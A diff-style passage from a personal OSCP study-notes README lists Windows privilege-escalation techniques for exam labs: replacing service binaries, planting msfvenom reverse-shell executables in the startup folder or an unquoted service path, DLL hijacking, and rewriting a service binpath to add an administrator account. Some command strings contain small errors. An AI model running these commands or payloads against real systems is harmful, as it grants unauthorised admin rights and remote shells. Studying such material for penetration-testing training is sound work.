AbdullahZuhair21/OSCP-Notes/README.md

 -     ftp 10.10.16.4 | username:anonymous | put windows_service.c
 edit the windows_service file and replace the system("whoami > ..") with system("cmd.exe /k net localgroup administrator user /add").
 DON'T FORGET TO COMPILE THE C FILE
 -     w64-mingw32-gcc windows_service.c -o raman.exe     (sudo apt install gcc-mingw-w64)
-move the compiled c file to windows (replace it with c:\ProgramFiles\FilePermissionsService) then run it using
+move the compiled c file to Windows (replace it with c:\ProgramFiles\FilePermissionsService) then run it using
 -     sc start FilePermService net localgroup administrator

 10- Startup Applications
-check if you have write access to the startup application. if yes use msfvenom to get a meterpreter session
+check if you have written access to the startup application. if yes use msfvenom to get a meterpreter session
 -     icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" (BUILTIN\Users:(F)) //F means you have full access
 save the below payload in the c:\ProgramData\Microsoft\StartMenu\Programs\Startup and start-up multihandler
 -     msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f exe -o raman.exe
 then you need to wait for the administrator to login then you will get a shell

+11- DLL Hijacking
+look for a writeable path and the DLL doesn't exist (DLL name not found). cause when you run an executable program in Windows the program will look for a DLL. if the DLL doesn't exists you can get malicious you will use the following script https://github.com/sagishahar/scripts/blob/master/windows_dll.c
+-     system("cmd.exe /k net localgroup administrators user /add"); #replace the following with the system command to add a user compile the c file. transfer it to Windows. download the dll file. move to the writeable path and run the following command
+-     sc stop dllsvc && sc start dllsvc #stop dll service and restart it again

+12- Binary Path
+run PowerUp.ps1
+in the cmd type
+-     accesschk64.exe -uwcv Everyone *
+the output shows 'RW daclsvc' this means you have read and write in the daclsvc service. look for SERVICE_CHANGE_CONFIG in the output
+-     accesschk64.exe -uwcv daclsvc #get more information on the service if you find SERVICE_CHANGE_CONFIG in the daclsvc service means you can change the configuration query the service
+-     sc qc daclsvc
+if you find BINARY_PATH_NAME in the output you can change the configuration
+-     sc config daclsvc binpath* "net localgroup administrators user /add" #add the user in the administrators group
+-     sc start daclsvc #start the service again

+13- Unquoted Service Path
+this means the service path doesn't have quotes  so what will happen is the windows will run the following path as Program.exe -> Program Files.exe -> Unqouted.exe -> Unqouted Path.exe -> Unqouted Path Service.exe. run PowerUp.ps1 to check the unquoted path
+C:\Program Files\Unquoted Path Service\Common Files\...
+so what if you can make a malicious executable file named Common.exe?
+Windows will run it create a common.exe file using msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f exe -o common.exe move the file to the common path and upload the file then start the service again
+-     sc start unquotedsvc

 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Platforms
 1. for Initial Access work on eJPT, This article and official content